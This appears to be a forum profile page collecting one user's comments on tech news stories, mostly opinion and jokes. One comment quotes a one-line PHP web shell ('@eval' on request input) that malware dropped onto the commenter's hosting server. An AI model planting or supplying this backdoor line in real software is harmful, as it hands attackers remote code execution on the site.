* Posts by Franklin

571 posts • joined 17 May 2007

Page:

Wheels fall off bid to sue Apple over iTunes anti-piracy shenanigans

Franklin

Re: They're suing the wrong company

Yours is the first cogent description of the problem I've actually seen. I keep hearing about how "Apple wiped out non-iTunes music!!!111!1!" but I've had an iPod for quite some time and have never experienced this issue. I've never downloaded music from RealNetworks, either.

2
1

Hackers use DRAFT emails as dead-drops for running malware

Franklin

"Nothing stands out as a red flag and it’s difficult to detect because no footprints are left behind," said the company.

Shirley the draft emails themselves count as 'footprints,' no?

2
1

Big Retail's Apple Pay killer CurrentC HACKED, tester info nicked

Franklin

Re: Concerns

"The US transaction market has always seemed pretty "quaint" to much of the rest of the world."

Yeah. One of my girlfriends lives in Canada, and I feel like a barbarian when I visit her and pay for anything with my debit card. There's always this awkward moment when the cashier looks for the chip, then looks at me like "what is this primitive stone-knives-and-bearskins payment technology you've provided me with? How does this archaic thing even work, anyway?"

5
0
Franklin

Re: Concerns

"Pick the least evil one?"

Given the difficulty in gauging the relative evil of, say, Apple vs. Walmart vs. Google vs. any of the other players, I'd rather say "pick the more secure one."

Given that both Apple and Google system involve exchanging a single-use token that's necessary for the retailer to hook the cash out of my bank account, whereas (as I understand it, anyway) the CurrentC scheme allows the retailer direct access to my bank account, I know which of the two I prefer...

5
0

SHOW ME THE MONEY! Ballmer on Amazon: 'They're not a real biz, they make NO cash'

Franklin

"I'm proud of the fact that I made $250bn under my watch as CEO," says Ballmer, neglecting to add that under someone--anyone--else as CEO, Microsoft might have made rather a lot more.

23
2

We chat to CloudFlare about its 'EVERYBODY GETS SSL' venture

Franklin

Re: Cloudflare

Another benefit of Cloudflare is your IP address is obfuscated from spam trackers. That, plus Cloudflare's rather...relaxed attitudes toward spam and malware, make Cloudflare the content delivery platform of choice for really aggressive hardcore spammers and malware distributors.

I keep track of who's hosting/serving the spamvertised domains in all the spam I receive. Right now, Cloudflare's serving a bit over a third of the domains for all the spam landing on my spamtrap addresses.

2
0

Sway: Microsoft's new Office app doesn't have an Undo function

Franklin

Re: continuing the trend

That was my impression, too. It's like Hypercard, only juiced with cloudy Web 2.0 goodness. Whee!

0
0

Scientists skeptical of Lockheed Martin's truck-sized FUSION reactor breakthrough boast

Franklin

Re: 10 years

Despite the naysayers, fusion power has made considerable progress. It hasn't progressed as fast as we would like, but sometimes new technology works that way.

For example, Lawrence Livermore and MIT have both produced fusion reactions that net more energy output than energy input. They don't do it for long, but they do do it, which shows it is possible.

I for one would like to see more research put into fusion power. If and when it can be made to work, it's a civilization-wide game-changer. A lot of political, social, economic, and resource problems turn out to be power problems, when you have copious amounts of cheap power. (For instance, much of the developing world, and more recently the developed world, struggles with water shortages; cheap and plentiful power make desalination easy.)

It pains me that we as a species spend more money on spectator sports every year than we do on something that can profoundly change human civilization for the better.

81
1

NSA Sentry Eagle placed spies in private companies

Franklin

The NSA worked with "specific US commercial entities to modify US manufacturer encryption systems to make them exploitable for SIGINT". And yet, strangely, they didn't see how that might blow up in their faces.

The NSA is tasked both with protecting US network infrastructure and also penetrating and gathering intelligence from networks. Those two goals seem contradictory to me. I guess we've found out which of the two had the higher priority...

If someone ten years ago had written this into the plot of a sci-fi novel, I'd have thought it was too implausible. Live and learn.

4
1

'Encryption will make life very easy for criminals and terrorists'

Franklin

Re: Encryption and the Bad Guys

When the police say encryption makes it impossible for them to catch the bad guys, I read that as a stark admission of failure on their part. Essentially, they're saying the can't actually figure out how to catch criminals without the crims' help. Normal investigatory processes are useless; they can't catch bad guys unless they use stuff the bad guys themselves have written about their crimes.

1
0

BENDY iPhone 6, you say? Pah, warp claims are bent out of shape: Consumer Reports

Franklin

Re: Laboratory Street

"This lab test is brought to you by the words 'Apple' and 'Dollar', and by a very large number indeed."

You might want to do some research.

Consumers Union, the outfit behind Consumer Reports, refuses to accept money from any maker of any of the products they test. They will not even accept test samples from manufacturers--they buy everything they test retail. The magazine itself contains no advertising. They have shown themselves willing to go up against car manufacturers, pharmaceutical companies, and other wealthy, entrenched interests.

Complain about the test methodology if you like. Criticize the test apparatus if you like. But saying Apple bought them off just makes you look profoundly ignorant.

34
1

FBI boss: Apple's iPhone, iPad encryption puts people 'ABOVE THE LAW'

Franklin

"What I'm worried about is, this is an indication to us as a country and as a people that, boy, maybe that pendulum swung too far."

No. As long as metadata remains trivially easy to gobble in massive quantities without legal oversight, the pendulum has not swung too far. Just the opposite--it hasn't swung nearly far enough.

12
1

What the 4K: High-def DisplayPort vid meets reversible USB Type C

Franklin

"They had a problem with that, saying and they want people to understand that expensive cables are more profitable."

There. Fixed it for them.

16
0

CloudFlare ditches private SSL keys for better security

Franklin
Mushroom

Ironic to see this article posted on El Reg's home page so close to an article about the Home Depot hack, considering the credit cards swiped from Home Depot are now being sold on a carder site served up by Cloudflare (who have so far ignored several abuse reports on the matter).

0
0

I sold 10 MILLION iPhone 6es at the weekend, says Tim Cook. What did you do?

Franklin
Flame

Given the rising cost and diminishing returns of a university education, a person more cynical than I might suggest buying a phone is more rational than buying a degree. Not that I would suggest anything so cynical, oh goodness no.

4
0

Italy's High Court orders HP to refund punter for putting Windows on PC

Franklin

Re: What are Apple buyers going to do.

"But in both cases, non-free (as in beer) software has been bundled with the hardware, for which you can get no refund. I have explained the difference between the two situations above."

OS X is free. Indeed, OS X upgrades are free to users of earlier systems. So the cases don't match. You're not buying software you don't intend to use. (And you don't have to use OS X if you don't want to; I have a Mac Mini server running Linux. But I didn't pay extra for OS X when I bought it.)

0
0

Data entry REAR-END SNAFU: Weighty ballsup leads to plane take-off flap

Franklin

Re: Does it really matter who shot it down?

"It could be true, but I think its a bit odd that military personnel capable of operating advanced defence electronics would be speaking in the open on insecure telephone lines, don't you?"

My father was career military. No, I don't find that one bit odd. Technically skilled specialists talking in the open on insecure telephone lines is *far* from surprising.

0
0

Drone captures shots of budding APPLE SPACESHIP HQ

Franklin

Re: Mic on drone

So I just got my first camera-equipped quadcopter, and on watching the video from my first test flight I was like "hey waitaminnit, there's no sound!" Then I thought about it for a second and realized why.

0
0

Comcast-Time Warner merger: CloudFlare's fare flare fair warning

Franklin

"Distributed web host CloudFlare says its costs rise dramatically..."

Don't let them hear you say the dreaded words "web host." Cloudflare serves up huge quantities of spam sites, malware, and phish sites...but its abuse team will quickly point out "we are not a Web host and therefore we will not/do not have to/cannot take any action against abuse on our network, now be off to bother someone else" if you file an abuse report.

5
1

Time to ditch HTTP – govt malware injection kit thrust into spotlight

Franklin

Re: Missing information

From the sound of it, the hacking device is simply a payload delivery system; it would be up to whoever is deploying it to equip it with the appropriate payload.

Attacks exist against both Mac OS and Windows targets by exploiting holes in Flash (the Mac DSchanger malware is an example of an attack that targets Mac OS). Presumably, there are attack vectors against Linux as well, and I'm aware of at least one attack against old versions of Android that could presumably be loaded into this device.

4
1

Google leaves STUPID vuln on Nest devices

Franklin

Re: That's actually a feature I'd want

In a world where most people aren't developers, most people will always run someone else's code. "Run your own code" is fine for you and me, less so for my parents, my sister, my inlaws, and most of the other people who will be using these devices.

And I don't know about you, but I spend enough time doing friends'n'family tech support as it is. I don't want to be security-auditing or writing new firmware for every single new gadget they buy! I hardly have enough time to get things done as it is.

18
1

HTTP-Yes! Google boosts SSL-encrypted sites in search results

Franklin

Re: When I can self sign, and provide my CA by side channel (e.g. DNSSEC)

One of the advantages I see to this scheme is it makes black hat SEO bullsh*t just that little bit harder. The economics of linkfarming and SEO spamming mean even small incremental changes in cost have large knock-on effects that can undermine the profitability of the enterprise.

If we start accepting self-signed certs, then all that will happen is linkfarms will start using SSL with self-signed certs. And the consequence of accepting self-signed certs are potentially quite troublesome. I'm not down with making MITM attacks easier, for example.

Ideas like changing the color of the padlock for self-signed vs. CA-signed certs don't stand well in a world where it's hard enough to convince folks to look for the padlock in the first place. And unlike some IT-savvy people I've met, I don't believe that users who are less savvy deserve to get hijacked.

2
0

Surfing the web from Android? We KNEW it – sorry, iOS fanbois

Franklin

Re: RE: Fanbois and Apple's Cash Mountain

"What always confuses me is *why* any Apple fanboi thinks Apple's mountain of cash is *in any way* a good thing."

Back in the 90s, before His Jobsness returned to Apple, everyone who didn't like the company was saying "they're losing money, clearly that's a bad thing. Apple is doomed."

Now it's "they're making money, clearly that's a bad thing."

I use a lot of different machines--there are three Apple devices, two generic PC boxes running Linux, and a NAS on my desk as I type this. I make money from my machines, and I find that I use an Apple laptop a lot more than I use any of the other computers. That suggests to me the money I invested in this tool was worth it. :)

0
0

Unbridled BONKING and rampant ROGERING at YOUR office!

Franklin

"18 per cent revealed they have even checked their phone during sexual intercourse. Ah, that’ll be the women."

Nah, not necessarily. I once live-tweeted an orgy I was involved in. It seemed like a good idea at the time, though a well-known astronomer unfollowed me as a result. (Well, I assume it was as a result, given the timing, though correlation doesn't always imply causation, I've heard.)

0
0

14 antivirus apps found to have security problems

Franklin

Re: Point of Issue

"I can do dangerous things with a knife or chainsaw - that doesn't make them bad or dangerous when used in a responsible manner."

Sure. But plain old-fashioned C is a bit like a chainsaw with no chain guard. It's a capable tool, but you gotta watch where you put your hands...

Frankly, though, I think the responsibility lies with the AV vendors, not the tools they use. It's a poor workman who blames his tools. These folks are supposed to know about security, that's what they do.

1
0

Google to feed machines with evidence of human physical weaknesses – and that's a good thing

Franklin

"Electric toothbrushes. Discuss."

Rule 34, my friend. You can use an electric toothbrush applied to the...oh, never mind, just Google it.

Used to have a girlfriend who loooooved "abusing" her electric toothbrush this way...

1
0

Bose says today is F*** With Dre Day: Beats sued in patent battle

Franklin

So the company was founded in 2006, and for the last 8 years it's been operating without a peep from Bose. Then, in 2014, it gets bought by a company with very deep pockets, and Bose asserts its patent claims.

I'm sure the timing is entirely coincidental.

31
1

Major problems beset UK ISP filth filters: But it's OK, nobody uses them

Franklin

Re: TalkTalk blocked my site

I run and/or administer a large number of Web sites, on subjects ranging from computer troubleshooting to emerging biotechnology to sex.

Ironically, my personal site, which has no content that might be deemed even remotely scandalous (and is not a WordPress site), is blocked on Sky...but my sex site, which talks about kink in very explicit terms, is not blocked by any of the major UK ISPs.

Let's hear it for Net censors, getting things wrong since...well, since the dawn of time, I think.

0
0

Comcast bosses: THAT pushy sales rep was only obeying orders

Franklin

A great sales organization always listens to the customer, first and foremost. Comcast, on the other hand, has other policies.

20
0

New Star Wars movie plot details leak, violate common sense and laws of physics

Franklin

Re: El Reg... Really?

"Harrison Ford breaking his ankle (sounds more like a bad sprain, break one of your own and see), has no tech connection.

Some gossip site has no tech connection, except they have an Internet site."

Looking for a tech connection on every Reg article? You must be new.

As for the rogue stormtrooper: The idea of a hero with a conflicted past trying to make good can be brilliant, if it's done properly, but I have little faith this movie will be done properly.

I mean, Star Wars Episode 3 was basically the story of Faust--the classic story of the fall from grace that's been a running theme in human literature since...well, since before there WAS literature. It's an archetypal story that's so embedded in our consciousness that it should not be possible to screw it up. Yet screw it up they did. So I might, I think, be forgiven for approaching any new movies in the franchise with a certain battle-hardened skepticism, I think.

0
1

Manic malware Mayhem spreads through Linux, FreeBSD web servers

Franklin

Had a Web server (a shared hosting server operated by a big-name hosting provider) get hit by this recently. It dropped a PHP file onto the server that contained the line

<?php @eval(stripslashes($_REQUEST[ev]));

from which, as you can imagine, all manner of mayhem became possible.

1
0

Skiddies turn Amazon cloud into 'crime-as-a-service' – security bod

Franklin

"Companies that do see malicious activity originating from AWS should contact us immediately at ec2-abuse@amazon.com."

I've done this on many occasions, only to receive a "thank you for your report, we have confirmed an Amazon EC2 instance was running at the address you specified" form email in response...and days or weeks later, it's still there.

Perhaps the problem is I'm a person and not a company? If companies can be people, shirley people can be companies too?

0
0

Listen: WORST EVER customer service call – Comcast is 'very embarrassed'

Franklin

Re: Three

I had almost this same conversation a year back with Clear Wireless. I tried invoking the "may I speak to your supervisor" conjuration, but they were too clever for me--I got the exact same treatment from the supervisor[1]. Wish I'd have recorded it.

[1] At least she claimed to be a supervisor. I have no empirical evidence this was the case.

3
0

Child diagnosed as allergic to iPad

Franklin

Nickel allergies can be nasty. I once had a friend who discovered the hard way that the bright finish on a particular sex toy she liked had nickel in it...not a good scene. Aluminum-clad devices are, presumably, not likely to cause this particular problem.

5
0

Brit SPACE HEDGEHOG team flies student Mars payload

Franklin

"The next flight, "Elysium", is planned for October."

At which time it will no doubt be shot down by Jodie Foster.

0
0

That AMAZING Windows comeback: Wow – 0.5% growth in 2015

Franklin

Microsoft? Microsoft? That name sounds familiar. Wait, don't tell me, it will come to me...

7
0

Vid shows how to easily hack 'anti-spy' webmail (sorry, ProtonMail)

Franklin

Re: "Roth had notified them about the hole via Twitter"

I'm definitely more "security researcher" than "security professional," and on several occasions have notified firms of vulnerabilities and abuse by Twitter...when emails, phone calls, and other more orthodox channels of communication have been ignored.

Sometimes, public shaming works where reasonable discourse doesn't.

5
0

Fridge hacked. Car hacked. Next up, your LIGHT BULBS

Franklin

Re: Why is security still an afterthought?

In this particular case it doesn't seem like security was an afterthought--the mesh connections were encrypted, after all--but that the security wasn't implemented in a way that made it resistant to sophisticated physical attack on the microcontroller.

Security is HARD. Even when you think about it from the get-go.

2
0

Boeing to start work on most powerful rocket ... EVER!

Franklin

Re: Scary stuff...

It's an urban legend that the blueprints of the Saturn V and F1 engines disappeared after the end of the Apollo program. In fact, every scrap of engineering records was kept.

The issue with simply rebuilding F1s from the original design wasn't the lack of blueprints, but rather of skilled labor. The F1s required a fearsome number of extremely sophisticated hand welds made by master welders. Each one was slightly different from all the others, as engineers made small hand tweaks to each. (For example, early prototype F1 engines had a nasty habit of tearing themselves apart because the hot combustion gasses would start swirling in the combustion chamber, setting up shock waves that would build until the engine failed catastrophically. The engineers solved the problem by adding baffles to the injector head to prevent the gases from swirling, but, lacking tools to model the combustion and design the appropriate baffling, they simply experimented until they found designs that worked.)

It's the institutional knowledge, not the blueprints, that were lost.

10
0

It's alive! Space hackers fire up zombie Sun probe's engines

Franklin

Inspiring

I've talked to folks who seem to think crowdfunding is a fad that will never produce anything more exciting than a pot of potato salad. Projects like this show what's possible when a group of smart, dedicated, and determined folks, supported by a lot of people who believe what they're doing is worthwhile, attempt something amazing.

13
0

Today in IT news: iPad Fleshlight a reality

Franklin

Re: What's next ?

Did the same thing myself, many years ago, then got the idea to add a phono plug to it and write chat software that produced DTMF tones. Worked over the phone or the Internet.

First prototype used a simple, small switching transistor instead of a MOSFET, which promptly exploded the first time the toy turned on. (Who knew a simple battery-powered vibrator consumed six watts of power?)

More recently, I've connected an Arduino to a MOSFET and a Neurosky EEG chip, to make a vibe that works on brainwaves. Works really well, and it's even more hands-free than this iPad nonsense.

0
0

What's it like using the LG G smartwatch and Android Wear? Let us tell YOU

Franklin
Coat

Re: Want standalone, or at least wifi

"being able to read and reply to massages from anywhere in the house or garden without carrying my phone all the time is a genuine benefit."

I've always been able to reply to massages without a phone, myself.

Badum-bum.

0
0

Code Spaces goes titsup FOREVER after attacker NUKES its Amazon-hosted data

Franklin

I used to think that any data you store in "the cloud" exists on someone else's whim if you store it there for free.

Apparently it exists on someone else's whim if you pay to store it there, too.

14
1

SpaceX 'Dragon V2' ROCKET PODULE can hover-land on Earth - or MARS

Franklin

Re: It's empty!

Seems to me that nowadays that's the kind of task best suited to a computer, not a bloke with a joystick. If the computer fails you're kinda up the creek anyway; it's not like you're going to take manual control and pilot it down yourself.

0
0

Australia iOS ransom gizmo-snatch OUTRAGE not our FAULT: Apple

Franklin

Re: Other sites have statements ....

That thought occurred to me, too. If it were the result of a large-scale breach at $OTHER_PLACE, we would not likely see the exploits so localized.

It could even be the result of something as mundane and ho-hum as a phishing attack. Hell, I get phish emails asking me to "verify my Apple credentials" at least once a month.

A coordinated phish attack is less sexy than hackers trawling through troves of stolen eBay data and targeting people who reuse passwords, but it seems a bit more plausible to me.

0
0

That Snowden chap was SPOT ON says China

Franklin

Re: China beats up the US for spying

Though in this case, when Mr. Pot and Mr. Kettle go about doing their various dirty deeds, it's we who suffer for it. The fact that they're both in the wrong about this doesn't mean they aren't right about each other.

19
0

Apple, Beats and fools with money who trust celeb endorsements

Franklin
Joke

Re: I am sticking with Sennheiser and Walkman

"You will only get your hands on my Clement-Clarke Airlite-62s over my cold, dead body."

Your terms are acceptable.

4
0

Obama allows NSA to exploit 0-days: report

Franklin

You know what would be cool?

If the Federal government created a large, well-funded organization designed to safeguard the computer and communications infrastructure so vital to the nation's economy, perhaps by discovering flaws in commercially important cryptographic systems and...

Oh, wait.

5
0

Apple says iOS, OS X is immune to Heartbleed SSL bug

Franklin

Re: Apple is misleading

"For example, is Safari vulnerable ? So if a apple or windows browser visits a malicious web site can data be stolen from the machine visiting the server. Heartbleed works on clients too."

If you're using a Web browser to browse to a secure site, the security of the connection depends on the version of SSL running server-side. If some banking site somewhere is vulnerable, that's not Apple's fault, seems to me.

Yes, anyone connecting to a vulnerable server is at risk. Apple hasn't said otherwise; what they said was "IOS and OS X never incorporated the vulnerable software and key Web-based services were not affected," which as near as I can tell seems to be true. (Mavericks, for instance, ships with OpenSSL 0.9.8y.)

0
0

Organic food: Pricey, not particularly healthy, won't save you from cancer

Franklin

Re: Luxury item

"The organic movement contains an awful lot of people who think organic=natural=Good whereas using modern pesticides in agriculture=unnatural=Poison, irrespective of the effects/evidence."

Indeed. And rather a lot of those folks don't know that organic food is often grown with pesticides, or if they do, assume for some bizarre reason that "natural" pesticides must be less poisonous than "synthetic" pesticides.

There's a wide range of pesticides used by "organic" growers, ranging from pyrethrins to copper sulfate. You really, really don't want to eat any of those pesticides--in many cases, they're more toxic than synthetics.

6
2

Page:

Forums